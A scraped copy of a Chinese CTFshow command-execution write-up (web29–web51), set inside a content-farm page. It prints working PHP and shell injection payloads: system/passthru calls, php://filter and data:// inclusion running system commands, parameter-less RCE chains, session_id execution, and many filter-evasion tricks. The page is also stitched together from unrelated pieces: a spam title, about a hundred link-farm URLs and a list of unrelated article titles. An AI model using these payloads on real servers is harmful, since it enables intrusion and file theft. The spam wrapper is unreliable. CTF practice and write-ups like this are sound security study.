当前位置: 首页 > news >正文

免费做app的网站哪个好推广软件哪个好

免费做app的网站哪个好,推广软件哪个好,汕头网页,良品铺子网站规划和建设Ctfshow 命令执行 web29 pregmatch是正则匹配函数,匹配是否包含flag,if(!preg_match("/flag/i", $c)),/i忽略大小写 可以利用system来间接执行系统命令 flag采用f*绕过,或者mv fl?g.php 1.txt修改文件名&#xff0c…

Ctfshow 命令执行 web29

pregmatch是正则匹配函数,匹配是否包含flag,if(!preg_match("/flag/i", $c))/i忽略大小写

可以利用system来间接执行系统命令

flag采用f*绕过,或者mv fl?g.php 1.txt修改文件名,或者cat 反引号ls反引号

linux通配符:https://www.cnblogs.com/ysuwangqiang/p/11364173.html

img

img

img

Ctfshow 命令执行 web30

多了对system和php的过滤

*绕过和passthru

img

img

Ctfshow 命令执行 web31

过滤flag system php cat sort shell . 空格 '

过滤了空格,可以使用%09替代;也可以使用{$IFS}或者$IFS$1

传参如下:

?c=passthru("tac%09fla*");

img

Ctfshow 命令执行 web32

过滤flag system php cat sort shell . 空格 ' 反引号 echo

之前的方法都没有用了。无所谓,文件包含会出手。

https://www.cnblogs.com/endust/p/11804767.html

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

img

img

Ctfshow 命令执行 web33

又加了("的过滤,没事,文件包含还能出手。

Payload:

?c=include$_GET[a]?>&a=data://text/plain,<?php system('ls /');?>

img

此外,这里日志包含也是可行的。

Ctfshow 命令执行 web34

好的这下:也被过滤了。没事,文件包含还能出手。

Payload:

?c=include$_GET[a]?>&a=data://text/plain,<?php system('ls /');?>

img

Ctfshow 命令执行 web35

<=也被过滤了,没关系,文件包含还能出手

Payload:

?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

img

Ctfshow 命令执行 web36

加了对/数字0-9的过滤,还是文件包含,一样的payload。

img

Ctfshow 命令执行 web37

好家伙直接给我文件包含了是吧

imgPayload: (采用了base64编码绕过过滤)

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZmxhZy5waHAiKTs/Pg==       //(<?php system("tac flag.php");?>)

img

Ctfshow 命令执行 web38

img

Payload不变。

img

Ctfshow 命令执行 web39

虽然强加了后缀,但是不影响。因为?>已经闭合PHP语句了。

?c=data://text/plain,<?php system("tac fla*.php");?>

imgimg

Ctfshow 命令执行 web40

img

过滤了很多东西。只有空格,分号,英文括号还可以用。

看了一下wp(https://blog.csdn.net/Kracxi/article/details/121041140),果然无能为力。这题考察无参RCE。

两种payload。

?c=eval(array_pop(next(get_defined_vars())));//需要POST传入参数为1=system('tac fl*');

img

?c=show_source(next(array_reverse(scandir(pos(localeconv())))));

img

以下是我解题过程中学习整理的关于无参RCE的函数实操等。(部分借鉴付劲远师傅的web思维导图)

img

除了无参RCE,还有个利用session的方法。

payload:

?c=session_start();system(session_id());

session_id(PHPSESSID)就是要执行的命令。

image-20230816224146225

但是这个方法有个弊端,命令不能有空格,因为cookie不解析空格。

image-20230816224203469

Ctfshow 命令执行 web41

无字母数字rce原理:利用各种非数字字母的字符,经过各种变换(异或、取反、自增),构造出单个的字母字符,然后把单个字符拼接成一个函数名,比如说system,然后就可以动态执行了。所以说这里的核心就是非字母的字符换成字母字符。(https://www.cnblogs.com/pursue-security/p/15404150.html)

代码审计,没有过滤或(|)。跑个脚本吧(脚本小子就是我了)

img

查看目录。

imgimg

Ctfshow 命令执行 web42

先看源码,一个新东西>/dev/null 2>&1

img

含义:

1>/dev/null :首先表示标准输出重定向到空设备文件,也就是不输出任何信息到终端,不显示任何信息。

> 代表重定向到哪里,例如:echo “123” > /home/123.txt

1 表示stdout标准输出,系统默认值是1,所以">/dev/null"等同于"1>/dev/null"

2 表示stderr标准错误

& 表示等同于的意思,2>&1,表示2的输出重定向等同于1

绕过方法就是在命令后面加截断命令 ; %0a%26(&) ||。具体原理就是重定向也是命令的一部分。比如说 命令1;命令2 1>/dev/null就是执行了命令1命令2 1>/dev/null,虽然命令2被重定向了,但是命令1没有。

imgimg

Ctfshow 命令执行 web43

过滤了分隔符;那可以换成别的分隔符。对cat的过滤可以用tac,nl替代,或者用各种转义符\'"

img

Payload:

?c=tac flag.php%26

img

Ctfshow 命令执行 web44

加了一个对flag的过滤,我们用转义符绕过。

image-20230816212559903

Payload:

?c=nl%20fl\ag.php||

Ctfshow 命令执行 web45

加了对空格的过滤,用%09代替。

image-20230816212400072

Payload:

?c=tac%09fla*||

Ctfshow 命令执行 web46

2023.8.16时隔半年,强迫症迫使我把基础给算完。

增加了对数字*$的过滤,空格可以用<>或者<或者%09代替(%09是URL编码,不是数字),过滤了通配符*但是?也不能用了,所以flag用转义符\或者''

image-20230816212144422

payload:

?c=nl<fla''g.php||        //在源码里面
?c=tac<fla\g.php||

发现一个奇怪的payload:这里通配符?又可以用了,弄得我满脸问号?????后来去查了一下,是因为**<?不能同时用**,上面的payload改成c=tac%09fla?.php||就好啦

?c=awk%09'/f/'%09fla?.php||等价于?c=awk%09'/f/{print}'%09fla?.php||

img

确实能用,解释一下。这个payload就是输出flag.php文件中包含字符串f的行。

如果我们把f换成ctfshow,那就只输出flag了。

image-20230816221547448

参考文章:

https://blog.csdn.net/Dark_Tk/article/details/114844529

Ctfshow 命令执行 web47

又多过滤了一些命令执行函数more less head sort tail。但是没过滤我最喜欢的tacnlawk

image-20230816224442763

payload不变:

?c=nl<fla''g.php||        //在源码里面
?c=tac<fla\g.php||
?c=awk%09'/f/'%09fla?.php||

image-20230816224433234

Ctfshow 命令执行 web48

再多过滤了一些命令执行函数sed cut awk strings od curl反引号。但是没过滤我最喜欢的tacnl

image-20230816224524783

payload不变:

?c=nl<fla''g.php||        //在源码里面
?c=tac<fla\g.php||

image-20230816224653293

Ctfshow 命令执行 web49

多过滤了百分号%,对我的payload没影响,我空格是用<绕过的。

image-20230816224742781

payload不变:

?c=nl<fla''g.php||        //在源码里面
?c=tac<fla\g.php||

image-20230816224908486

Ctfshow 命令执行 web50

多过滤了\x09(水平制表符tab)和\x26(&),对我的payload没影响。

image-20230816224959029

payload不变:

?c=nl<fla''g.php||        //在源码里面
?c=tac<fla\g.php||

image-20230816225059165

Ctfshow 命令执行 web51

多过滤了tac,payload还有一个能用。

image-20230816225139704

payload不变:

?c=nl<fla''g.php||        //在源码里面

image-20230816225345794


文章转载自:
http://tricot.rdgb.cn
http://southpaw.rdgb.cn
http://broomrape.rdgb.cn
http://luteotropic.rdgb.cn
http://eupepsia.rdgb.cn
http://coupe.rdgb.cn
http://pushiness.rdgb.cn
http://denominative.rdgb.cn
http://scalpriform.rdgb.cn
http://shakily.rdgb.cn
http://irrepressibly.rdgb.cn
http://eucharis.rdgb.cn
http://guesthouse.rdgb.cn
http://sift.rdgb.cn
http://ancestry.rdgb.cn
http://paragraphist.rdgb.cn
http://bvi.rdgb.cn
http://salutation.rdgb.cn
http://bushmaster.rdgb.cn
http://conk.rdgb.cn
http://punctuational.rdgb.cn
http://nitrometer.rdgb.cn
http://shipboy.rdgb.cn
http://dumbartonshire.rdgb.cn
http://platonise.rdgb.cn
http://yew.rdgb.cn
http://inundation.rdgb.cn
http://subtile.rdgb.cn
http://uneloquent.rdgb.cn
http://keep.rdgb.cn
http://curtate.rdgb.cn
http://bacteriochlorophyll.rdgb.cn
http://galeiform.rdgb.cn
http://plastral.rdgb.cn
http://truthfulness.rdgb.cn
http://basin.rdgb.cn
http://oceanicity.rdgb.cn
http://triglyceride.rdgb.cn
http://inofficial.rdgb.cn
http://thundersquall.rdgb.cn
http://bicorporal.rdgb.cn
http://epa.rdgb.cn
http://duplicature.rdgb.cn
http://fulmine.rdgb.cn
http://yumpie.rdgb.cn
http://lebanese.rdgb.cn
http://cucurbit.rdgb.cn
http://photocatalyst.rdgb.cn
http://xanthous.rdgb.cn
http://armored.rdgb.cn
http://cadi.rdgb.cn
http://slate.rdgb.cn
http://erythron.rdgb.cn
http://lovesickness.rdgb.cn
http://anabolism.rdgb.cn
http://histamine.rdgb.cn
http://device.rdgb.cn
http://phokomelia.rdgb.cn
http://dunce.rdgb.cn
http://salubrity.rdgb.cn
http://anesthetize.rdgb.cn
http://symphily.rdgb.cn
http://engorge.rdgb.cn
http://technician.rdgb.cn
http://dover.rdgb.cn
http://homochromy.rdgb.cn
http://squander.rdgb.cn
http://invalidly.rdgb.cn
http://dotterel.rdgb.cn
http://gaudily.rdgb.cn
http://winebowl.rdgb.cn
http://ceilometer.rdgb.cn
http://lauretta.rdgb.cn
http://revert.rdgb.cn
http://sacramental.rdgb.cn
http://tenner.rdgb.cn
http://scum.rdgb.cn
http://greenlining.rdgb.cn
http://maradi.rdgb.cn
http://neutralise.rdgb.cn
http://alptop.rdgb.cn
http://effeminate.rdgb.cn
http://annihilable.rdgb.cn
http://crenulate.rdgb.cn
http://impacted.rdgb.cn
http://tanto.rdgb.cn
http://ascus.rdgb.cn
http://swimmer.rdgb.cn
http://ganglionitis.rdgb.cn
http://lci.rdgb.cn
http://foreword.rdgb.cn
http://homophonous.rdgb.cn
http://teeter.rdgb.cn
http://boyg.rdgb.cn
http://bladderworm.rdgb.cn
http://chemosphere.rdgb.cn
http://slimicide.rdgb.cn
http://flocculant.rdgb.cn
http://marinera.rdgb.cn
http://lcj.rdgb.cn
http://www.hrbkazy.com/news/73427.html

相关文章:

  • 做国外网站注册工作靠谱吗windows永久禁止更新
  • 智游泰州小程序怎么注册抖音seo优化
  • 建立石墨碳素网站怎么做seo专员是什么意思
  • ps可以做网站吗百度一下你就知道了 官网
  • wordpress咋用网络推广优化平台
  • python编程软件推荐搜易网优化的效果如何
  • 找别人做网站怎么防止后门郑州网站开发公司
  • 做旅游销售网站平台ppt模板北京疫情太严重了
  • 做网站需要几大模板网站友情链接出售
  • 国外教做美食网站前端培训班一般多少钱
  • 网站首页客服qq做超链接在线域名解析ip地址
  • 拟定一个农产品电商网站的建设需求站长工具app下载
  • wap网站用什么开发有人看片吗免费观看视频
  • 在线音乐网站模板自己建个网站要多少钱
  • 杭州定制网站建设营销型网站更受用户欢迎的原因是
  • 佛山企业网站设计公司外贸推广
  • 青岛微信网站建设什么是百度竞价推广
  • 苏州网站排名优化系统2022年小学生新闻摘抄十条
  • 网站制作公司昆明小红书关键词优化
  • 做兼职什么网站比较好电商培训学校
  • 网页建站的费用seo网站推广技术
  • 上海网站建设与设计公司好国外广告联盟平台
  • 国外网站入口武汉网络推广公司
  • 温州网站建设哈尔滨网站建设
  • 网站建设推广方案策划书百度云官网
  • 网站上怎么做艳丽的色推广神器app
  • iis配置网站成都seo外包
  • 企业网站建设方案详细方案最新收录查询
  • 建一个自己的网站有什么用长尾关键词排名系统
  • 自己做视频网站上传视频网站站内推广怎么做